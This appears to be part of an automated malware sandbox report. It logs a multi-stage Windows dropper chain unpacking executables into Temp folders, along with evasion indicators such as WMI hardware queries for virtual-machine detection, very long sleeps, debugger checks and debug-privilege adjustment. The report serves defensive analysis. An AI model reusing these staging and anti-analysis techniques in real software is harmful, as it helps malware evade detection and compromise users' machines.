                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_00172BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCommand line argument: Kernel32.dll1_2_00392BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCommand line argument: Kernel32.dll2_2_00132BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCommand line argument: Kernel32.dll3_2_00FD2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCommand line argument: 08A10_2_00413780
                    Source: C:\Users\user\Desktop\file.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wextract.pdb source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
                    Source: Binary string: wextract.pdbGCTL source: file.exe, pluT14Nj54.exe.0.dr, plvy67MJ29.exe.2.dr, plct23La85.exe.1.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: plvy67MJ29.exe, 00000003.00000003.259906180.0000000004FA4000.00000004.00000020.00020000.00000000.sdmp, buze36rj14.exe, 00000004.00000000.260096763.0000000000902000.00000002.00000001.01000000.00000007.sdmp, buze36rj14.exe.3.dr
                    Source: Binary string: _.pdb source: caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeUnpacked PE file: 10.2.caQi43qE17.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeUnpacked PE file: 10.2.caQi43qE17.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017724D push ecx; ret 0_2_00177260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_0039724D push ecx; ret 1_2_00397260
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_0013724D push ecx; ret 2_2_00137260
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD724D push ecx; ret 3_2_00FD7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0041C40C push cs; iretd 10_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00423149 push eax; ret 10_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0041C50E push cs; iretd 10_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004231C8 push eax; ret 10_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0040E21D push ecx; ret 10_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0041C6BE push ebx; ret 10_2_0041C6BF
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_008D8ACD push FFFFFFE1h; ret 10_2_008D8ADC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_008DBA18 push edi; retf 10_2_008DBA19
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0246573F push cs; retf 10_2_02465740
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00172F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00172F1D
                    Source: grWB27Fb84.exe.0.drStatic PE information: 0x8398F8D0 [Sun Dec 18 17:01:04 2039 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00171AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00171AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00391AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00391AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00131AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00131AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_00FD1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe TID: 5060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe TID: 996Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe TID: 4124Thread sleep count: 1520 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe TID: 2464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWindow / User API: threadDelayed 1520Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                    Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeAPI call chain: ExitProcess graph end node
                    Source: caQi43qE17.exe, 0000000A.00000002.363644726.000000000092C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00175467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00175467
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00172390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00172390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00392390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00392390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00132390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00132390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00FD2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00172F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00172F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_008D6FBB push dword ptr fs:[00000030h]10_2_008D6FBB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0040ADB0 GetProcessHeap,HeapFree,10_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_02460490 LdrInitializeThunk,10_2_02460490
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00176F40 SetUnhandledExceptionFilter,0_2_00176F40
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00176CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00176CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00396F40 SetUnhandledExceptionFilter,1_2_00396F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exeCode function: 1_2_00396CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00396CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00136F40 SetUnhandledExceptionFilter,2_2_00136F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exeCode function: 2_2_00136CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00136CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD6F40 SetUnhandledExceptionFilter,3_2_00FD6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exeCode function: 3_2_00FD6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00FD6CF0
